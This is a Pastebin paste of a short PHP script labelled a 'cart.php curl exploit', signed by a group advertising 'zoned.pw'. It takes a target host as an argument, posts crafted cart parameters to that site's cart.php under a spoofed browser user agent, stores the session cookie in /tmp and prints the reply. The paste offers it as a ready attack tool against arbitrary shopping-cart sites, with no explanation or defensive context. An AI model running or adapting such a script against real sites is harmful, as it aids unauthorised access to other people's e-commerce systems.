Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/php -f
- <?php
- #
- # cart.php curl exploit
- # getting zoned
- # zoned.pw
- # vulnerabilties everywhere, and its just beginning :)
- #
- //
- // HTTP POST,
- //
- $target = $argv[1];
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_URL, "http://$target/cart.php");
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "productid=2&updateonly=1");
- curl_setopt($ch, CURLOPT_TIMEOUT, 3);
- curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
- curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
- $buf = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- echo $buf;
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement